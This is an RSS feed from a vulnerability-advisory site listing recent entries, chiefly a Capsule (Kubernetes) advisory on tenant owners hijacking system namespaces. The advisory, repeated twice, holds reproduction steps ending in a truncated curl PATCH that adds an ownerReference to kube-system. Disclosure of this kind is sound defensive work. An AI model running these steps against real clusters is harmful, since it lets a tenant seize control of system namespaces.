<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Tue, 06 Oct 2026 03:18:11 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-249776</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-249776</link>
      <description>EUVD-2026-249776</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-249776</guid>
    </item>
    <item>
      <title>fkie_cve-2024-39690</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2024-39690</link>
      <description>&lt;p&gt;Capsule is a multi-tenancy and policy-based framework for Kubernetes. In Capsule v0.7.0 and earlier, the tenant-owner can patch any arbitrary namespace that has not been taken over by a tenant (i.e., namespaces without the ownerReference field), thereby gaining control of that namespace. Version 0.7.1 contains a patch.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Capsule is a multi-tenancy and policy-based framework for Kubernetes. In Capsule v0.7.0 and earlier, the tenant-owner can patch any arbitrary namespace that has not been taken over by a tenant (i.e., namespaces without the ownerReference field), thereby gaining control of that namespace. Version 0.7.1 contains a patch.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2024-39690</guid>
    </item>
    <item>
      <title>GHSA-mq69-4j5w-3qwp — Capsule tenant owner with "patch namespace" permission can hijack system namespaces</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-mq69-4j5w-3qwp</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Go: github.com/projectcapsule/capsule&lt;/p&gt;
&lt;p&gt;# Attack Vector
Then, let me briefly explain the reasons for the errors mentioned above: 1. The &amp;#39;kubectl edit&amp;#39; command was used to patch the namespace, but this operation requires both &amp;#39;get&amp;#39; and &amp;#39;patch&amp;#39; permissions, hence the error. One should use methods like &amp;#39;curl&amp;#39; to directly send a PATCH request; 2. The webhook does not intercept patch operations on &amp;#39;kube-system&amp;#39; because &amp;#39;kube-system&amp;#39; does not have an ownerReference.&lt;/p&gt;
&lt;p&gt;# Below are my detailed reproduction steps
1. Create a test cluster
`kind create cluster --image=kindest/node:v1.24.15 --name=k8s`
2. Install the capsule
`helm install capsule projectcapsule/capsule -n capsule-system --create-namespace`
3. Create a tenant
```
kubectl create -f - &amp;lt;&amp;lt; EOF
apiVersion: capsule.clastix.io/v1beta2
kind: Tenant
metadata:
  name: tenant1
spec:
  owners:
  - name: alice
    kind: User
EOF
```
4. Create user alice
```
./create-user.sh alice tenant1 capsule.clastix.io
export KUBECONFIG=alice-tenant1.kubeconfig
```
5. Patch kube-system (The first command is executed in the current shell, while the 2nd and 3rd commands require a different shell window because the current shell is being used as a proxy.)
```
kubectl proxy&lt;/p&gt;
&lt;p&gt;export DATA=&amp;#39;[{&amp;#34;op&amp;#34;: &amp;#34;add&amp;#34;, &amp;#34;path&amp;#34;: &amp;#34;/metadata/ownerReferences&amp;#34;, &amp;#34;value&amp;#34;:[{&amp;#34;apiVersion&amp;#34;: &amp;#34;capsule.clastix.io/v1beta2&amp;#34;, &amp;#34;blockOwnerDeletion&amp;#34;: true, &amp;#34;controller&amp;#34;: true, &amp;#34;kind&amp;#34;: &amp;#34;Tenant&amp;#34;, &amp;#34;name&amp;#34;: &amp;#34;tenant1&amp;#34;, &amp;#34;uid&amp;#34;: &amp;#34;ce3f2296-4aaa-45b0-a8fe-879d5096f193&amp;#34;}]}]&amp;#39;&lt;/p&gt;
&lt;p&gt;curl http://localhost:8001/api/v1/namespaces/kube-system/ -X PATC…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Go: github.com/projectcapsule/capsule&lt;/p&gt;
&lt;p&gt;# Attack Vector
Then, let me briefly explain the reasons for the errors mentioned above: 1. The &amp;#39;kubectl edit&amp;#39; command was used to patch the namespace, but this operation requires both &amp;#39;get&amp;#39; and &amp;#39;patch&amp;#39; permissions, hence the error. One should use methods like &amp;#39;curl&amp;#39; to directly send a PATCH request; 2. The webhook does not intercept patch operations on &amp;#39;kube-system&amp;#39; because &amp;#39;kube-system&amp;#39; does not have an ownerReference.&lt;/p&gt;
&lt;p&gt;# Below are my detailed reproduction steps
1. Create a test cluster
`kind create cluster --image=kindest/node:v1.24.15 --name=k8s`
2. Install the capsule
`helm install capsule projectcapsule/capsule -n capsule-system --create-namespace`
3. Create a tenant
```
kubectl create -f - &amp;lt;&amp;lt; EOF
apiVersion: capsule.clastix.io/v1beta2
kind: Tenant
metadata:
  name: tenant1
spec:
  owners:
  - name: alice
    kind: User
EOF
```
4. Create user alice
```
./create-user.sh alice tenant1 capsule.clastix.io
export KUBECONFIG=alice-tenant1.kubeconfig
```
5. Patch kube-system (The first command is executed in the current shell, while the 2nd and 3rd commands require a different shell window because the current shell is being used as a proxy.)
```
kubectl proxy&lt;/p&gt;
&lt;p&gt;export DATA=&amp;#39;[{&amp;#34;op&amp;#34;: &amp;#34;add&amp;#34;, &amp;#34;path&amp;#34;: &amp;#34;/metadata/ownerReferences&amp;#34;, &amp;#34;value&amp;#34;:[{&amp;#34;apiVersion&amp;#34;: &amp;#34;capsule.clastix.io/v1beta2&amp;#34;, &amp;#34;blockOwnerDeletion&amp;#34;: true, &amp;#34;controller&amp;#34;: true, &amp;#34;kind&amp;#34;: &amp;#34;Tenant&amp;#34;, &amp;#34;name&amp;#34;: &amp;#34;tenant1&amp;#34;, &amp;#34;uid&amp;#34;: &amp;#34;ce3f2296-4aaa-45b0-a8fe-879d5096f193&amp;#34;}]}]&amp;#39;&lt;/p&gt;
&lt;p&gt;curl http://localhost:8001/api/v1/namespaces/kube-system/ -X PATC…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-mq69-4j5w-3qwp</guid>
    </item>
  </channel>
</rss>
